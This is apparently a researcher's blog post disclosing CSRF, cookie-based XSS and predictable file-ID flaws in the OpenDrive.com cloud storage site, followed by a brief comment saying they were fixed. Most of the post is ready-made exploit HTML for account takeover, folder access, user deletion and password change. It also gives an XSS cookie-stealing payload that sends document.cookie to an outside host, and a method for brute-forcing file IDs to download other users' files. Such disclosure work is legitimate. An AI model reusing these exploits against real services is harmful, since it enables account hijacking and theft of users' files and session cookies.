After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.
If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.
XSRF in Creating Groups
[code language=”html”]
<html>
<!– Discovered by @OsandaMalith–>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.opendrive.com/ajax", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
</form>
</body>
</html>
[/code]
Complete Account Takeover XSRF
An attacker can completely takeover the account of any user once he runs the XSRF exploit in the browser while logged in.
Change the email to a new email account in pwn.html and once the victim executes this code the email will receive full admin rights 🙂 Next execute the GetFolders.html to get full permissions to the victims folders.
The attacker can host these exploits in his server and make the users run them. Please use CSRF tokens to fix this.
File: pwn.html
[code language=”html”]
<html>
<!– Discovered by @OsandaMalith–>
<body>
<form name="0day" action="https://www.opendrive.com/ajax" method="POST">
<input type="hidden" name="action" value="create-accessuser" />
<input type="hidden" name="access_first_name" value="Eve" />
<input type="hidden" name="access_last_name" value="Haxor" />
<input type="hidden" name="access_password" value="pwned" />
<input type="hidden" name="access_email" value="youremail@yopmail.com" />
<input type="hidden" name="access_admin_mode" value="1" />
<input type="hidden" name="access_notification" value="0" />
<input type="hidden" name="access_max_storage" value="5120" />
<input type="hidden" name="access_bw_max" value="1024" />
<input type="hidden" name="group_id" value="110701" />
<input type="hidden" name="access_phone" value="123" />
<input type="hidden" name="access_password_change" value="1" />
<input type="hidden" name="access_position" value="Tester" />
<input type="hidden" name="access_send_password" value="1" />
<input type="submit" value="Click Here to Pwn an account" />
</form>
</body>
</html>
[/code]
Next we take control of all folders. You can clearly see that from the attackers account we were able to access the “confidential.txt” file which was inside the victim’s account.
File: GetFolders
[code language=”html”]
<html>
<!– Discovered by @OsandaMalith–>
<body>
<form name="0day" action="https://www.opendrive.com/ajax" method="POST">
<input type="hidden" name="action" value="set-folder-access" />
<input type="hidden" name="access_email" value="haxor15@yopmail.com" />
<input type="hidden" name="foldersObj[OTZfMTYxOTU0X1ljcFAw]" value="1" />
<input type="hidden" name="foldersObj[OTZfMTYxOTU1X1FKWFk4]" value="1" />
<input type="hidden" name="foldersObj[OTZfMTYxOTU2X05DMHlB]" value="1" />
<input type="hidden" name="foldersObj[OTZfMTYxOTU3X1NKc1Jl]" value="1" />
<input type="submit" value="Click Here to Pwn the Folders" />
</form>
</body>
</html>
[/code]
Here is a proof of concept video I made to demonstrate this.
Delete Account XSRF
Once a user adds another user into the users list for the deleting option there is no XSRF token used so an attacker can arbitrarily delete the added user by specifying the email.
[code language=”html”]
<html>
<body>
<form action="https://www.opendrive.com/ajax" method="POST">
<input type="hidden" name="action" value="user-delete" />
<input type="hidden" name="access_email" value="youremail@yopmail.com" />
<input type="submit" value="Click Here to Delete" />
</form>
</body>
</html>
[/code]
Change Password
We can change the user’s password by the following XSRF exploit.
[code language=”html”]
<html>
<!– Discovered by @OsandaMalith –>
<body>
<form action="https://www.opendrive.com/settings/profile" method="POST">
<input type="hidden" name="_wpnonce" value="24ce7b505d" />
<input type="hidden" name="user_info_old_password" value="OldPassword" />
<input type="hidden" name="user_info_new_password" value="NewPassword" />
<input type="hidden" name="user_info_repeat_password" value="NewPassword" />
<input type="hidden" name="form_action" value="update_password" />
<input type="submit" value="Change Password" />
</form>
</body>
</html>
[/code]
Cookie Based XSS
I found a Cookie based XSS vulnerability in the domain admin.opendrive.com.
[code language=”text”]
GET /login HTTP/1.1
Host: admin.opendrive.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: login_value="><svg/onload="alert(‘XSS by Osanda’)">;
Connection: keep
[/code]
[code language=”bash”]
curl -i -s -k -X ‘GET’
-H ‘User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0’
-b ‘login_value="><svg/onload="alert(1337)">’
‘http://admin.opendrive.com/login’ | grep 1337
[/code]
We can steal the session cookies and get access to other accounts. The cookies are not marked as HTTPOnly. Also not marked as Secure.
Here’s a demonstration of stealing the session cookie 🙂
[code language=”html”]
<svg/onload=document.location=’http://localhost:8000/?’+document.cookie>
[/code]
Weak Encoding
I noticed that we can easily bruteforce files.
https://dev.opendrive.com/api/v1/download/file.json/OTZfMzA5NDU1Nl8=?inline=1
Base64 decoded = OTZfMzA5NDU1Nl8 =
96_3094556_
We can bruteforce these values and encode back to base64 and download random files of people.
This attack is so nice. Its already fixed?
It was fixed right after report.